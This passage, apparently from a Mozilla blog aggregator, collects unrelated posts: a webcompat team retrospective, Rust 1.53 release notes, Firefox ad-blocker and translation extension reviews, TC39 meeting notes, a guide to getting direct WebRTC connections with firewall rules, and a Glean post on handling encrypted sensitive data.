Dennis has drastically reduced the number of old diagnoses that were on top (or at the bottom?) of our pile. He is also now the module owner for Site Interventions, which helps Mozilla hotfix websites. When a site is broken and outreach is unlikely to be successful, this is one of the ways we can fix the website on the fly so that people can continue to enjoy using troubled websites.

James is the mind and the smooth operator behind Web Platform Tests at Mozilla. He is doing an amazing job encouraging Mozilla engineers to write more Web Platform Tests, and he makes sure that everything stays synchronized with other vendors. Web Platform Tests are essential for discovering bugs in specifications and differences in implementations. He is also the core person for the work on BiDi at Mozilla. BiDi is another important piece of the Web Compatibility puzzle: manually testing websites is costly, and WebDriver makes it possible to automate testing of website functionality. If the cost is lower, web developers can test their websites in more than one browser and discover and fix their web compatibility issues before we discover them.

Ksenia is the owner of webcompat.com and the webcompat ML bot. The ML bot helps us pre-filter bugs and determine whether each one is a valid webcompat issue. We receive between 700 and 800 bugs a week, and that’s a lot for our small team; we would not be able to manage without the bot. Tirelessly, she has improved the tools we use to minimize the boring parts of the work and, at the same time, found solutions to help bug reporters have a better experience.

Softvision team: Oana and Raul. I have a lot of respect for the people at Softvision helping Mozilla triage bugs. This task is sisyphean: every week, 700 to 800 bugs come in. Luckily we have a bot for pre-triage, but once bugs are evaluated as valid, they decipher the old runes of bug reports to understand what the bug reporter suffered and turn them into something more compelling for the people who will diagnose them. Previously, we had Ciprian and Sergiu.

Thomas is the architect of the Site Interventions. He also makes sure that sites continue to work when tracking protection blocks things; he recently implemented SmartBlock. Thomas is this giant who can touch everything in the Webcompat team, yet remains super caring when we do not understand something. He explains what he does, and this is gold: it means that people can grow, evolve, and become a better version of themselves.

Contributors And Interns

The project would be nothing without the contributors and interns who worked with us on making the site, the tools, the process better:

Abdul, Alexa, Beatriz, Carol, Deepthi, Guillaume, Kate, Mariana, mesha, Reinhart, and more…

Those Who Were

And there are those who were once on the webcompat team and contributed to its success: Mike, Adam, Eric, Hallvord, Ola. I could write a lot more about them.

« Concerning my neighbor, then, I have observed that it is not fruitful to examine the facts, the states of things, the institutions, the objects of his empire, but only its inclinations. For if you examine my empire, you will go to see the blacksmiths and find them forging nails, passionate about nails, singing the hymns of nail-making. Then you will go to see the woodcutters and find them felling trees, passionate about the felling of trees, and filled with intense jubilation at the hour of the woodcutter’s feast, which is that of the first crack, when the majesty of the tree begins to bow down. And if you go to see the astronomers, you will see them passionate about the stars, listening to nothing but their silence. And indeed each imagines himself to be just that. Now if I ask you: “What is happening in my empire, and what will be born there tomorrow?” you will tell me: “Nails will be forged, trees will be felled, stars will be observed, and so there will be stores of nails, stores of wood, and observations of stars.” For, short-sighted and with your nose pressed against things, you have not[…] »

Antoine de Saint-Exupéry. « Citadelle. »

Challenging The Comfort Of My Current Position

When you have worked long enough at a company you like, it becomes easy to feel comfortable. So every couple of years, I put myself in the position of looking for another job, sometimes even having job interviews with some companies. I try to limit these interviews to the strict minimum by carefully selecting the companies I apply to.

I want to be in a position where I have to choose between staying at Mozilla and discovering a new area with interesting people and interesting work, sometimes areas of which I probably have poor knowledge. This is slightly tricky, because many companies tend to recruit people ready to fit into the machinery rather than people with an ability to work and learn.

I have now been at Mozilla for 8 years, but I want to keep staying at Mozilla a choice rather than merely a comfortable place. So I will continue to explore new opportunities, as I have always done.

Comments

If you have more questions, things I may have missed, or a different take on them, feel free to comment… and be mindful.

Otsukare!

Niko MatsakisCTCFT Social Hour

Hey everyone! At the CTCFT meeting this Monday (2021-06-21), we’re going to try a “social hour”. The idea is really simple: for the hour after the meeting, we will create breakout rooms in Zoom with different themes. You can join any breakout room you like and hangout.

The themes for the breakout rooms will be based on suggestions. If you have an idea for a room you’d like to try, you can post it in a dedicated topic on the #ctcft Zulip stream. Or, if you see somebody else has posted an idea that you like, then add a 👍 emoji. We’ll create the final breakout list based on what we see there.

The breakout rooms can be as casual or focused as you like. For example, we will have some default rooms for hanging out – please make suggestions for icebreaker topics on Zulip! We also plan to have some rooms where people chat while doing Rust work: for example, yaahc suggested a room for folks who want to write mentoring instructions.

Also: a reminder that there is a CTCFT Calendar that you can subscribe to to be reminded of future meetings. If you like, I can add you to the invite, just ask on Zulip or Discord.

See you there!

Firefox Add-on ReviewsWhat’s the best ad blocker for you?

So you’ve decided to do something about all those annoying ads you’re barraged with online. What pushed you over the edge? Auto-play video ads? Blaring banners? Tired of your music interrupted by a sudden sponsorship? Was it the realization they intentionally make the ‘Close’ buttons [x] on ads super tiny so you accidentally click the very thing you’re trying to avoid? 

There are a number of approaches you can take to blocking ads with a browser extension—it just depends on what you’re trying to achieve. Here are some of the best ad blockers based on different goals…

I just want an awesome, all-purpose ad blocker.

Keep in mind a benefit of any decent ad blocker is that you should experience a faster web, since fewer ads means there’s less content for your browser to load. It’s a win-win: ditch awful ads while speeding up your experience. 

Also know, however, that ad blockers can occasionally break web pages when innocent content gets caught in the ad blocking crossfire. Some websites will even detect ad blockers and restrict access until you disable the blocker.

uBlock Origin

By any measure uBlock Origin is one of the gold standards in ad blocking. Not only an elite ad blocker that stops nearly every type of ad by default—including video and pop-ups—uBlock Origin is lightweight, so it doesn’t consume much CPU and memory. 

Not much setup required. Works brilliantly out of the box with a matrix of built-in filters (though you can import your own), including a few that block more than just ads but hidden malware sources, as well. Clicking its toolbar icon activates the extension’s minimalist pop-up menu where at a glance you can see blocked tracking sources and how much of the overall page was nearly impacted by advertising. 

Unlike some ad blockers that allow what they consider “non-intrusive” ads through their filters, uBlock Origin has no advertising whitelist by default and tries to block all ads, unless you tell it otherwise.

AdBlock for Firefox

Refined extension design and strong content filters make AdBlock for Firefox a solid choice for people who don’t necessarily despise all ads (just the super annoying, invasive kind) and perhaps recognize that advertising, however imperfect it may be, provides essential compensation for your favorite content creators and platforms. 

AdBlock blocks all types of ads by default, but lets users opt in to Acceptable Ads by choice. Acceptable Ads is an independent vetting program where advertisers can participate to have their ads pass through content filters if they meet certain criteria, like only allowing display ads that fit within strict size parameters, or text ads that adhere to tight aesthetic restrictions. 

AdBlock also makes it easy for you to elect to accept certain niche types of advertising, like ads that don’t use third party tracking, or ads on your favorite YouTube and Twitch channels. 

<figcaption>AdBlock makes it easy to allow ads on your favorite YouTube and Twitch channels.</figcaption>

AdBlock’s free tier works great, but indeed some of our favorite features—like device syncing and the ability to replace ads with custom pics of adorable animals!—sit behind a paid service.

I want ad blocking with a privacy boost.  

Arguably all ad blockers enhance your privacy and security, simply by virtue of the fact that they block ads that have tracking tools embedded in them. Even scarier than secretive corporate tracking is malvertising—ads maliciously infected with malware, unbeknownst to even the advertising companies themselves until it’s too late.

So while all good ad blockers are privacy protective by nature, here are some that take additional steps…

AdGuard AdBlocker

Highly effective ad blocker and anti-tracker that even works well on Facebook and YouTube. AdGuard also smartly allows certain types of ads by default—like search ads (since you might be looking for a specific product or service) and “self promotion” ads (e.g. special deals on site-specific shopping platforms like “50% off today only!” sales, etc.)

AdGuard goes to great lengths to not only block the ads you don’t want, but the trackers trying to profile you. It automatically knows to block more than two million malicious websites and has one of the largest tracking filters in the game. 

Sick of social media ‘Like’ and ‘Share’ buttons crowding your page? Enable AdGuard’s social media filter and all social widgets are scrubbed away.

Ghostery

Block ads and hidden browser trackers by default. Ad blocking is but a part of Ghostery’s utility. 

Ghostery is quite powerful as a “privacy ad blocker,” but it also scores big points for being user-friendly and easy to operate. It’s simple to set Ghostery’s various core features, like enabling/disabling Enhanced Ad Blocking and Anti-Tracking. 

Blocking ads isn’t enough. I want a blocker that fights back! 

AdNauseum

Advertisers love knowing which ads you actually click. The ads you choose to actively engage with gives advertisers the clearest signals about what you want and how to market to you. 

AdNauseum throws a wrench in those plans by silently clicking every single ad the extension blocks. So not only does AdNauseum remove annoying ads, it overwhelms tracking companies with so much info on you—since you’re apparently interested in everything!—it’s impossible to build an effective profile on you. Hah.

More than just a means of hitting back at ad tech, AdNauseum is a highly capable content blocker built atop the strong foundation of uBlock Origin’s open-source code. It also features additional tracking protection and anti-malware features. 

AdNauseum’s advault interface offers a visual overview of its handiwork behind the scenes.

YouTube ads are out of control.

AdBlocker for YouTube

If you don’t want to bother with any ad blocking other than YouTube, AdBlocker for YouTube is the choice. 

It very simply and effectively removes both video and display ads from YouTube. Period. Enjoy a faster and more focused YouTube experience. 

I want pop-up ads to go away forever. 

Popup Blocker (strict)

This lightweight extension simply stops pop-ups from deploying. Popup Blocker (strict) conveniently holds them for you in the background—giving you the choice to interact with them if you want. 

You’ll see a notification alert when pop-ups are blocked. Just click the notification for options. 

My webmail is bloated with ads.

Webmail Ad Blocker

Tired of ads thrown in your face when all you want to do is check email? 

Remove ads and get more breathing room in and around your inbox. Webmail Ad Blocker not only blocks all the box ads crowding the edges of your webmail, it also obliterates those sneaky ads that appear as unread messages. Ugh, gross. 

These are some of our favorite ad blockers. Feel free to explore more privacy & security extensions on addons.mozilla.org.

The Rust Programming Language BlogAnnouncing Rust 1.53.0

The Rust team is happy to announce a new version of Rust, 1.53.0. Rust is a programming language that is empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, getting Rust 1.53.0 is as easy as:

rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.53.0 on GitHub.

What's in 1.53.0 stable

This release contains several new language features and many new library features, including the long-awaited IntoIterator implementation for arrays. See the detailed release notes to learn about other changes not covered by this post.

IntoIterator for arrays

This is the first Rust release in which arrays implement the IntoIterator trait. This means you can now iterate over arrays by value:

for i in [1, 2, 3] {
    ..
}

Previously, this was only possible by reference, using &[1, 2, 3] or [1, 2, 3].iter().

Similarly, you can now pass arrays to methods expecting a T: IntoIterator:

let set = BTreeSet::from_iter([1, 2, 3]);
for (a, b) in some_iterator.chain([1]).zip([1, 2, 3]) {
    ..
}

This was not implemented before, due to backwards compatibility problems. Because IntoIterator was already implemented for references to arrays, array.into_iter() already compiled in earlier versions, resolving to (&array).into_iter().

As of this release, arrays implement IntoIterator with a small workaround to avoid breaking code. The compiler will continue to resolve array.into_iter() to (&array).into_iter(), as if the trait implementation does not exist. This only applies to the .into_iter() method call syntax, and does not affect any other syntax such as for e in [1, 2, 3], iter.zip([1, 2, 3]) or IntoIterator::into_iter([1, 2, 3]), which all compile fine.

Since this special case for .into_iter() is only required to avoid breaking existing code, it is removed in the new edition, Rust 2021, which will be released later this year. See the edition announcement for more information.

Or patterns

Pattern syntax has been extended to support | nested anywhere in the pattern. This enables you to write Some(1 | 2) instead of Some(1) | Some(2).

match result {
     Ok(Some(1 | 2)) => { .. }
     Err(MyError { kind: FileNotFound | PermissionDenied, .. }) => { .. }
     _ => { .. }
}

Unicode identifiers

Identifiers can now contain non-ascii characters. All valid identifier characters in Unicode as defined in UAX #31 can now be used. That includes characters from many different scripts and languages, but does not include emoji.

For example:

const BLÅHAJ: &str = "🦈";

struct 人 {
    名字: String,
}

let α = 1;

The compiler will warn about potentially confusing situations involving different scripts. For example, using identifiers that look very similar will result in a warning.

warning: identifier pair considered confusable between `ｓ` and `s`

HEAD branch name support in Cargo

Cargo no longer assumes the default HEAD of git repositories is named master. This means you no longer need to specify branch = "main" for git dependencies from a repository where the default branch is called main.

Incremental Compilation remains off by default

As previously discussed on the blog post for version 1.52.1, incremental compilation has been turned off by default on the stable Rust release channel. The feature remains available on the beta and nightly release channels. For the 1.53.0 stable release, the method for reenabling incremental is unchanged from 1.52.1.

Stabilized APIs

The following methods and trait implementations were stabilized.

Other changes

There are other changes in the Rust 1.53.0 release: check out what changed in Rust, Cargo, and Clippy.

Contributors to 1.53.0

Many people came together to create Rust 1.53.0. We couldn't have done it without all of you. Thanks!

Firefox Add-on ReviewsTranslate the web easily with a browser extension

Do you do a lot of language translating on the web? Are you constantly copying text from one browser tab and navigating to another to paste it? Maybe you like to compare translations from different services like Google Translate or Bing Translate? Need easy access to text-to-speech features? 

Online translation services provide a hugely valuable function, but for those of us who do a lot of translating on the web, the process is time-consuming and cumbersome. With the right browser extension, however, web translations become a whole lot easier and faster. Here are some fantastic translation extensions for folks with differing needs…

I just want a simple, efficient way to translate. I don’t need fancy features.

Simple Translate

It doesn’t get much simpler than this. Highlight the text you want to translate and click the extension’s toolbar icon to activate a streamlined pop-up. Your highlighted text automatically appears in the pop-up’s translation field and a drop-down menu lets you easily select your target language. Simple Translate also features a handy “Translate this page” button should you want that. 

Translate Web Pages

Maybe you just need to translate full web pages, like reading news articles in other languages, how-to guides, or job related sites. If so, Translate Web Pages could be the ideal solution for you with its sharp focus on full-page utility. 

However the extension also benefits from a few intriguing additional features, like the ability to select up to three top languages you most commonly translate into (each one easily accessible with a single click in the pop-up menu), designate specific sites to always translate for you upon arrival, and your choice of three translation engines: Google, Yandex, and DeepL. 

To Google Translate

Very popular, very simple translation extension that exclusively uses Google’s translation services, including text-to-speech. 

Simply highlight any text on a web page and right-click to pull up a To Google Translate context menu that allows three actions: 1) translate the text into your preferred language; 2) listen to audio of the text; 3) translate the entire page.

Right-click any highlighted text to activate To Google Translate.

I do a ton of translating. I need power features to save me time and trouble.

ImTranslator

Striking a balance between out-of-the-box ease and deep customization potential, ImTranslator leverages three top translation engines (Google, Bing, Translator) to cover 100+ languages; the extension itself is even available in nearly two dozen languages. 

Other strong features include text-to-speech, dictionary and spell check in eight languages, hotkey customization, and a huge array of ways to tweak the look of ImTranslator’s interface—from light and dark themes to font size and more. 

Mate Translate

A slick, intuitive extension that performs all the basic translation functions very well; it’s Mate Translate’s paid tier, though, that unlocks some unique features, such as Sync (saved translations can appear across devices and browsers, including iPhone and Mac). 

There’s also a neat Phrasebook feature, which lets you build custom word and phrase lists so you can return to common translations you frequently need. It works offline, too, so it’s ideal for travellers who need quick reference to common foreign phrases. 

These are some of our favorites, but there are plenty more translation extensions to explore on addons.mozilla.org.

Mozilla Privacy BlogMozilla joins call for fifth FCC Commissioner appointment

In a letter sent to the White House on Friday, June 11, 2021, Mozilla joined over 50 advocacy groups and unions asking President Biden and Vice President Harris to appoint the fifth FCC Commissioner. Without a full team of appointed Commissioners, the Federal Communications Commission (FCC) is limited in its ability to move forward on crucial tech agenda items such as net neutrality and on addressing the country’s digital divide.

“Net neutrality preserves the environment that creates room for new businesses and new ideas to emerge and flourish, and where internet users can choose freely the companies, products, and services that they want to interact with and use. In a marketplace where consumers frequently do not have access to more than one internet service provider (ISP), these rules ensure that data is treated equally across the network by gatekeepers. We are committed to restoring the protections people deserve and will continue to fight for net neutrality,” said Amy Keating, Mozilla’s Chief Legal Officer.

In March 2021, we sent a joint letter to the FCC asking the Commission to reinstate net neutrality as soon as it is back in working order. Mozilla has been one of the leading voices in the fight for net neutrality for almost a decade, together with other advocacy groups, and has defended user access to the internet in the US and around the world. Our work to preserve net neutrality has been a critical part of that effort, including our lawsuit against the FCC to keep these protections in place for users in the US.

The post Mozilla joins call for fifth FCC Commissioner appointment appeared first on Open Policy & Advocacy.

Spidermonkey Development BlogTC39 meeting, May 25-26 2021

Due to the recent changes on freenode, TC39 has moved to Matrix as its communication platform of choice. Read more here.

The TC39 meeting in May, one of the shorter two-day meetings of the committee, primarily focused on more mature proposals, and no stage 1 proposals were introduced. Object.hasOwn moved forward quickly, reaching stage 3 at this meeting. In addition, Top-level await and RegExp Match Indices both moved to stage 4. Resizable ArrayBuffers and Growable SharedArrayBuffers advanced to stage 3, and implementation will soon start in major browsers. This proposal introduces growable and shrinkable memory, which will have implications for web developers as well as other specifications such as WebGPU and WebAssembly.

Realms, which is finally in a shape that browsers would be willing to implement, was held back from stage 3 due to ergonomic concerns for certain use cases.

Keep an eye on…

  • Realms

Normative Spec Changes

None.

Proposals Seeking Advancement to Stage 4

RegExp Match Indices

  • Notes
  • Proposal
  • PR
  • Spec
  • Slides
  • Summary: RegExp Match Indices allow retrieving the start and end indices of a match (and of its capture groups). This is useful for applications such as text editors. You can now use it with the d flag, for example: /hello/d (see the sketch after this list).
  • Impact on SM: Already Shipping,
  • Outcome: Advanced to stage 4.
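
A minimal sketch of what the d flag gives you (the string and offsets below are illustrative):

// With the `d` flag, each match records its start and end offsets.
const match = /world/d.exec("hello world");
console.log(match.indices[0]); // [6, 11]: start and end of the whole match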

Top Level Await

  • Notes
  • Proposal
  • PR
  • Slides
  • Summary: Top level await treats modules as large async functions, allowing developers to use the await keyword at the top level of a module. This simplifies modules that require immediate async work (see the sketch after this list).
  • Impact on SM: Already Shipping,
  • Outcome: Advanced to stage 4.
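
A minimal sketch of what this allows inside a module (the URL is illustrative):

// `await` now works at the top level of a module; no async wrapper needed.
const response = await fetch("https://example.com/config.json");
export const config = await response.json();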

Proposals Seeking Advancement to Stage 3

Symbols as WeakMap Keys

  • Notes, More notes
  • Proposal
  • Slides
  • Summary: The Symbols as WeakMap Keys proposal would allow users to use symbols as WeakMap keys, which is currently forbidden (see the sketch after this list). The complication is that certain symbols, namely registered symbols, are never garbage collected, which makes them similar to a primitive value such as an integer when used as a WeakMap key. The contention around this proposal is whether the two types of symbols should be treated differently. This was not resolved in this meeting.
  • Impact on SM: Will need implementation
  • Outcome: Did not advance to stage 3.
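
A sketch of the current behavior the proposal would change (the exact error message varies by engine):

const wm = new WeakMap();
try {
  // Today only objects may be WeakMap keys, so this throws a TypeError.
  wm.set(Symbol("session"), { user: "alice" });
} catch (e) {
  console.log(e instanceof TypeError); // true
}
// Registered symbols, e.g. Symbol.for("session"), are never garbage
// collected, which is the crux of the unresolved contention.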

ResizableArrayBuffer for Stage 3

  • Notes
  • Proposal Link
  • Slides
  • Summary: Introduces two new ArrayBuffers: one resizable, the other only growable (and shared). See the sketch after this list.
  • Impact on SM: Will need implementation
  • Outcome: Advanced to stage 3.
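
A sketch of the API shape per the proposal at the time (subject to change before shipping):

// A resizable buffer declares an upper bound and can be resized in place.
const buf = new ArrayBuffer(1024, { maxByteLength: 4096 });
console.log(buf.resizable); // true
buf.resize(2048);

// The shared variant can only grow.
const sab = new SharedArrayBuffer(1024, { maxByteLength: 4096 });
sab.grow(2048);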

Intl DisplayNames v2 for Stage 3

  • Notes
  • Proposal Link
  • Slides
  • Summary: Adds further coverage to the existing Intl.DisplayNames API (see the sketch after this list). It was initially blocked from advancement while Issue #29 was sorted out.
  • Impact on SM: Will need implementation
  • Outcome: Advanced to stage 3.
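
A sketch of the kind of coverage v2 adds, per the proposal (new type values such as "calendar" and "dateTimeField"):

const calendars = new Intl.DisplayNames(["en"], { type: "calendar" });
console.log(calendars.of("gregory")); // "Gregorian Calendar"

const fields = new Intl.DisplayNames(["es"], { type: "dateTimeField" });
console.log(fields.of("month")); // "mes"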

Object.hasOwn for Stage 3

  • Notes
  • Proposal Link
  • Slides
  • Summary: Checking an object for a property is, at the moment, rather unintuitive and error-prone. This proposal introduces a more ergonomic wrapper around a common pattern involving Object.prototype.hasOwnProperty, which allows the following:
      let hasOwnProperty = Object.prototype.hasOwnProperty
    
      if (hasOwnProperty.call(object, "foo")) {
        console.log("has property foo")
      }
    

    to be written as:

      if (Object.hasOwn(object, "foo")) {
        console.log("has property foo")
      }
    
  • Impact on SM: Implemented
  • Outcome: Advanced to stage 3.

Realms for stage 3

  • Notes
  • Proposal Link
  • Slides
  • Summary: Realms exposes a new global without a document for use by JS programmers: think iframes without the document. The new proposed API is “isolated realms”, which does not allow passing bare objects between realms. This is an improvement from the browser-architecture perspective, but it is less ergonomic. This issue was called out in the meeting, and the proposal did not advance as a result.
  • Impact on SM: No change
  • Outcome: Did not advance to stage 3.

Extend TimeZoneName Option Proposal for Stage 3

  • Notes
  • Proposal Link
  • Slides
  • Summary: Adds further options for the TimeZoneName option in Intl.DateTimeFormat, allowing for greater accuracy in representing different time zones (see the sketch after this list).
  • Impact on SM: Implemented
  • Outcome: Advanced to stage 3.
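
A sketch of the new options, per the proposal (values such as "shortOffset" and "shortGeneric"):

const fmt = new Intl.DateTimeFormat("en-US", {
  timeZone: "America/Los_Angeles",
  timeZoneName: "shortOffset",
});
// Renders the zone as a GMT offset, e.g. "6/14/2021, GMT-7".
console.log(fmt.format(new Date()));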

Stage 3 Updates

Temporal update

  • Notes
  • Proposal Link
  • Slides
  • Summary: Introduces a new date/time library. If you would like to try it ahead of time, they have created a cookbook and polyfill for experimentation (a usage sketch follows this list). During implementation in SpiderMonkey, a few issues were discovered in the spec. This update covers fixes to those issues.
  • Impact on SM: Implementation in Progress. Must not ship unflagged until IETF standardizes timezone/calendar string serialization formats
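
A quick sketch against the polyfill; the API surface was still in flux at the time, so names may differ from what eventually ships:

// Immutable date arithmetic in the ISO calendar.
const today = Temporal.now.plainDateISO();
const due = today.add({ days: 30 });
console.log(due.toString()); // e.g. "2021-07-14"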

Proposals Seeking Advancement to Stage 2

Adopting Unicode behavior for set notation in regular expressions

  • Notes
  • Proposal Link
  • Slides
  • Summary: Adds syntax and semantics for the following set operations: difference/subtraction (in A but not in B), intersection (in both A and B), and nested character classes (needed to enable the above). See the sketch after this list.
  • Impact on SM: Will need implementation.
  • Outcome: Advanced to stage 2.
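
A sketch of the proposed notation (stage 2 and subject to change; shown in comments since no engine shipped it at the time):

// [A--B]  difference: in A but not in B,
//         e.g. /[\p{Decimal_Number}--[0-9]]/v  (non-ASCII digits)
// [A&&B]  intersection: in both A and B,
//         e.g. /[\p{Letter}&&\p{Script=Greek}]/v  (Greek letters)
// [A[B]]  nested character classes, which the operations above require.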

Stage 2 Updates

Intl Enumeration API update

  • Notes
  • Proposal Link
  • Slides
  • Summary: Intl enumeration allows inspecting what is available on the Intl API (see the sketch after this list). Initially, we had reservations that this could be used for fingerprinting. Mozilla did an analysis and no longer holds this concern. However, it is unclear whether this API has use cases that warrant its inclusion in the language.
  • Impact on SM: Will need implementation
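
A sketch of the proposed API shape at the time (stage 2, subject to change):

// Enumerate the values the implementation supports for a given key.
console.log(Intl.supportedValuesOf("currency")); // e.g. ["AED", "AFN", ...]
console.log(Intl.supportedValuesOf("timeZone")); // e.g. ["Africa/Abidjan", ...]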

Niko MatsakisCTCFT 2021-06-21 Agenda

The second “Cross Team Collaboration Fun Times” (CTCFT) meeting will take place one week from today, on 2021-06-21 (in your time zone)! This post describes the main agenda items for the meeting; you’ll find the full details (along with a calendar event, zoom details, etc) on the CTCFT website.

Afterwards: Social hour

After the CTCFT this week, we are going to try an experimental social hour. The hour will be coordinated in the #ctcft stream of the rust-lang Zulip. The idea is to create breakout rooms where people can gather to talk, hack together, or just chill.

Turbowish and Tokio console

Presented by: pnkfelix and Eliza (hawkw)

Rust programs are known for being performant and correct – but what about when that’s not true? Unfortunately, the state of the art for Rust debugging tooling today often falls short. This is particularly true for Async Rust, where users need insight into the state of the async runtime so that they can resolve deadlocks and tune performance. This talk discusses what top-notch debugging and tooling for Rust might look like. One particularly exciting project in this area is tokio-console, which lets users visualize the state of projects built on the tokio library.

Guiding principles for Rust

Presented by: nikomatsakis

As Rust grows, we need to ensure that it retains a coherent design. Establishing a set of “guiding principles” is one mechanism for doing that. Each principle captures a goal that Rust aims to achieve, such as ensuring correctness or efficiency. The principles give us a shared vocabulary to use when discussing designs, and they are ordered so as to give guidance in resolving tradeoffs. This talk will walk through a draft set of guiding principles for Rust that nikomatsakis has been working on, along with examples of how those principles are enacted through Rust’s language, library, and tooling.

François MarierHow to get a direct WebRTC connections between two computers

WebRTC is a standard real-time communication protocol built directly into modern web browsers. It enables the creation of video conferencing services which do not require participants to download additional software. Many services make use of it and it almost always works out of the box.

The reason it just works is that it uses a protocol called ICE to establish a connection regardless of the network environment. What that means, however, is that in some cases your video/audio connection will need to be relayed (using end-to-end encryption) to the other person via a third-party TURN server. In addition to adding extra network latency to your call, that relay server might become overloaded at some point and drop or delay packets coming through.

Here's how to tell whether or not your WebRTC calls are being relayed, and how to ensure you get a direct connection to the other host.

Testing basic WebRTC functionality

Before you place a real call, I suggest using the official test page which will test your camera, microphone and network connectivity.

Note that this test page makes use of a Google TURN server which is locked to particular HTTP referrers and so you'll need to disable privacy features that might interfere with this:

  • Brave: Disable Shields entirely for that page (Simple view) or allow all cookies for that page (Advanced view).

  • Firefox: Ensure that network.http.referer.spoofSource is set to false in about:config, which it is by default.

  • uMatrix: The "Spoof Referer header" option needs to be turned off for that site.

Checking the type of peer connection you have

Once you know that WebRTC is working in your browser, it's time to establish a connection and look at the network configuration that the two peers agreed on.

My favorite service at the moment is Whereby (formerly Appear.in), so I'm going to use that to connect from two different computers:

  • canada is a laptop behind a regular home router without any port forwarding.
  • siberia is a desktop computer in a remote location that is also behind a home router, but in this case its internal IP address (192.168.1.2) is set as the DMZ host.

Chromium

For all Chromium-based browsers, such as Brave, Chrome, Edge, Opera and Vivaldi, the debugging page you'll need to open is called chrome://webrtc-internals.

Look for RTCIceCandidatePair lines and expand them one at a time until you find the one which says:

  • state: succeeded (or state: in-progress)
  • nominated: true
  • writable: true

Then, from the name of that pair (e.g. N6cxxnrr_OEpeash), find the two matching RTCIceCandidate lines (one local-candidate and one remote-candidate) and expand them.

In the case of a direct connection, I saw the following on the remote-candidate:

  • ip shows the external IP address of siberia
  • port shows a random number between 1024 and 65535
  • candidateType: srflx

and the following on local-candidate:

  • ip shows the external IP address of canada
  • port shows a random number between 1024 and 65535
  • candidateType: prflx

These candidate types indicate that a STUN server was used to determine the public-facing IP address and port for each computer, but the actual connection between the peers is direct.

On the other hand, for a relayed/proxied connection, I saw the following on the remote-candidate side:

  • ip shows an IP address belonging to the TURN server
  • candidateType: relay

and the same information as before on the local-candidate.

Firefox

If you are using Firefox, the debugging page you want to look at is about:webrtc.

Expand the top entry under "Session Statistics" and look for the line (should be the first one) which says the following in green:

  • ICE State: succeeded
  • Nominated: true
  • Selected: true

then look in the "Local Candidate" and "Remote Candidate" sections to find the candidate type in brackets.
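
In either browser you can also inspect the selected pair programmatically from the developer console, using the standard RTCPeerConnection.getStats() API. A rough sketch, assuming pc holds the page's active RTCPeerConnection:

async function remoteCandidateType(pc) {
  const stats = await pc.getStats();
  stats.forEach((report) => {
    if (
      report.type === "candidate-pair" &&
      report.nominated &&
      (report.state === "succeeded" || report.state === "in-progress")
    ) {
      // "srflx"/"prflx" indicate a direct (STUN-assisted) connection;
      // "relay" means the call is going through a TURN server.
      const remote = stats.get(report.remoteCandidateId);
      console.log("remote candidateType:", remote.candidateType);
    }
  });
}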

Firewall ports to open to avoid using a relay

In order to get a direct connection to the other WebRTC peer, one of the two computers (in my case, siberia) needs to open all inbound UDP ports since there doesn't appear to be a way to restrict Chromium or Firefox to a smaller port range for incoming WebRTC connections.

This isn't great and so I decided to tighten that up in two ways by:

  • restricting incoming UDP traffic to the IP range of siberia's ISP, and
  • explicitly denying incoming traffic to the UDP ports I know are open on siberia.

To get the IP range, start with the external IP address of the machine (I'll use the IP address of my blog in this example: 66.228.46.55) and pass it to the whois command:

$ whois 66.228.46.55 | grep CIDR
CIDR:           66.228.32.0/19

To get the list of open UDP ports on siberia, I sshed into it and ran nmap:

$ sudo nmap -sU localhost

Starting Nmap 7.60 ( https://nmap.org ) at 2020-03-28 15:55 PDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000015s latency).
Not shown: 994 closed ports
PORT      STATE         SERVICE
631/udp   open|filtered ipp
5060/udp  open|filtered sip
5353/udp  open          zeroconf

Nmap done: 1 IP address (1 host up) scanned in 190.25 seconds

I ended up with the following in my /etc/network/iptables.up.rules (ports below 1024 are denied by the default rule and don't need to be included here):

# Deny all known-open high UDP ports before enabling WebRTC for canada
-A INPUT -p udp --dport 5060 -j DROP
-A INPUT -p udp --dport 5353 -j DROP
-A INPUT -s 66.228.32.0/19 -p udp --dport 1024:65535 -j ACCEPT

Patrick ClokeConverting Twisted’s inlineCallbacks to async

Almost a year ago we had a push at Element to convert the remaining instances of Twisted’s inlineCallbacks to use native async/await syntax from Python [1]. Eventually this work got covered by issue #7988 (which is the original basis for this blogpost).

Note that Twisted itself gained some …

Data@Mozilla⚠️Danger zone⚠️: handling sensitive data in Glean

Co-authored by Alessio Placitelli and Beatriz Rizental.
(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online.)

🎵 “Precious and fragile things, need special handling […]” 🎵, and that applies to data, too!

Over the years, a number of projects at Mozilla had to handle the collection of sensitive data users explicitly decided to share with us (think, just as an example, things as sensitive as full URLs). Most of the time projects were designed and built over our legacy telemetry systems, leaving developers with the daunting task of validating their implementations, asking for security reviews and re-inventing their APIs.

With the advent of Glean, Mozilla’s Data Org took the opportunity to improve this area, allowing our internal customers to build better data products.

Data collection + Pipeline Encryption = ✨

We didn’t really talk about what we mean by “special handling”, did we?

For data that is generally not sensitive (e.g. the amount of available RAM), after a product using Glean submits a ping, it hits the ingestion pipeline. The communication channel between the Glean client and the ingestion server is HTTPS, which means the channel is encrypted from one end (the client) to the other end (the ingestion server). After the ingestion server is hit, unencrypted pings are routed within our ingestion pipeline and dispatched to the destination tables.

For products requesting pipeline encryption, to make sure only specific individuals and pipeline engineers can access the data, the path is slightly different. When such a product is enabled in the ingestion pipeline, an encryption key is provisioned and must be configured in the product using Glean before new pings can be successfully ingested into a data store. From that moment on, all the pings generated by the Glean client will look like this:

{
"payload": "eyJhbGciOiJFQ0RILUVTI..."
}

Not a lot of info to route things within the pipeline, right? 🤦

Luckily for our pipeline, all Glean ping submissions conform to the HTTP Edge Specification. By knowing the Glean application id (which maps to the document namespace from the HTTP Edge Specification) and the ping type, the pipeline knows everything it needs to route pings to their destination, look up the decryption keys and decrypt the payload before inserting it into the destination table.

It’s important to note that only a handful of pipeline engineers are authorized to inspect the encrypted payload (and enabled to fix things if they break!) and only an explicit list of individuals, created when enabling the product in the pipeline, is allowed to access the final data within a secure, locked down environment.

How does the ✨magic✨ happen in the Glean SDKs?

